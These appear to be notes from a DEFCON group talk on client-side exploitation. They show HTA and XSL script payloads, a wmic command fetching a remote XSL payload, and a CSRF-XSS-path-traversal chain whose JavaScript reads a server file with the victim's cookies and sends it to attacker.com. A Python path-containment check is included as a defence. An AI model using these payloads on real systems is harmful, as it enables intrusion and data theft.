DEFCON DC3158
Summary: Client Side Exploitation, Attack Chaining.
Client Side Exploitation: Script Based Attack
• PowerShell, JScript, VBScript.
• VBScript: people still use IE, and from it you can call wmic and PowerShell scripts to execute.
• But antivirus has started to flag PowerShell scripts.
Client Side Exploitation: AMSI (Antimalware Scan Interface)
• Stream scanning of memory, files and URLs.
• Can be integrated in any application.
• Most antivirus products use it.
Client Side Exploitation: How Do We Bypass? HTA and XSL.
• What is HTA? HTA is short for HTML Application. HTAs are basically a way to run an HTML app in a pop-out view; they are treated much like an actual application, except that they are written in HTML.
• They can execute VBScript, which means you can execute commands:

<script language="VBScript">
set objShell = CreateObject("Wscript.Shell")
objShell.run "calc.exe"
self.close
</script>
Client Side Exploitation: What is XSL? XSL, aka XSLT, is a Microsoft Stylesheet Script Format. These payloads can also run Microsoft scripting languages:

<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</ms:script>
</stylesheet>

The really cool thing with an XSL file is that it can be loaded remotely from the Windows command line with WMI:
wmic os get /FORMAT:"http://xx.xx.xx.xx/payload.xsl"
Attack Chaining
Attack Chaining
• The CSRF page makes an XSS request.
• The XSS sends a request to the path traversal page.
• Using path traversal we are able to read sensitive information (like the WAS password file).
• The response of the path traversal is appended to the XSS request.
Attack Chaining: 2 pages with 3 vulnerabilities
• Authenticated XSS with no CSRF protection: http://victim.com/authenticated/search?query=XSS
• Authenticated path traversal page: http://victim.com/authenticated/catFile.php?file=file.php
Attack chaining to bypass the authentication, download the file and send it to the attacker!
• CSRF to bypass: create a page containing an image that initiates the CSRF and gets initial code execution using the search:

<img src="http://victim.com/authenticated/search?query=&quot;><script src='http://attacker.com/xmlhttp-request.js'></script>">

-------- "xmlhttp-request.js" -----------------
var http = new XMLHttpRequest();
http.onreadystatechange = function() {
  if (http.readyState == 4) {
    // once the traversal response arrives, redirect the browser to attacker.com with the response appended
    window.location = "http://www.attacker.com/" + http.responseText;
  }
};
http.open("GET", "http://victim.com/authenticated/catFile.php?file=../../../../../../.././../../../", true);
http.withCredentials = true;  // send the victim's authenticated session cookies
http.send();
------ END FILE ---------------------------------------
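The path traversal link is the one a defender can close server-side, and closing it breaks the whole chain. As an added example that is not from the talk, here is the containment check that a catFile endpoint needs, written in Python (the /var/www/app root and the request strings are constructed for illustration), next to the string-prefix check that is a common but incomplete fix:

```python
import posixpath
from pathlib import PurePosixPath

# Constructed web root standing in for wherever catFile.php serves files from
# (hypothetical path, not one taken from the talk).
WEB_ROOT = "/var/www/app"


def resolve_requested_file(base, requested):
    """Return the normalised path for `requested` only if it stays inside `base`.

    This is the check the catFile endpoint is missing: join, normalise (which
    collapses every '..' and '.' segment, including mixed runs like '.././'),
    and test containment on the normalised result. Returns None on escape.
    Pure string/path logic, so it behaves the same on every OS; a deployed
    version should additionally resolve symlinks before the containment test.
    """
    base_path = PurePosixPath(base)
    req = PurePosixPath(requested)
    if req.is_absolute():
        return None          # joining an absolute path would discard `base`
    candidate = PurePosixPath(posixpath.normpath(str(base_path / req)))
    if candidate == base_path:
        return None          # the directory itself, not a file under it
    try:
        candidate.relative_to(base_path)
    except ValueError:
        return None          # normalised path climbed out of the web root
    return candidate


def naive_prefix_check(base, requested):
    """The string-prefix test often used as a first fix, kept only as a contrast:
    it accepts '/var/www/app2/x' because that string starts with '/var/www/app'."""
    candidate = posixpath.normpath(str(PurePosixPath(base) / requested))
    return candidate.startswith(base)
```

Any one of the three links (CSRF token on the search page, output encoding of the query, or this containment check) stops the chain; the server-side file check is the one that also protects against every other way of reaching catFile.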
Recommendations
More recommendations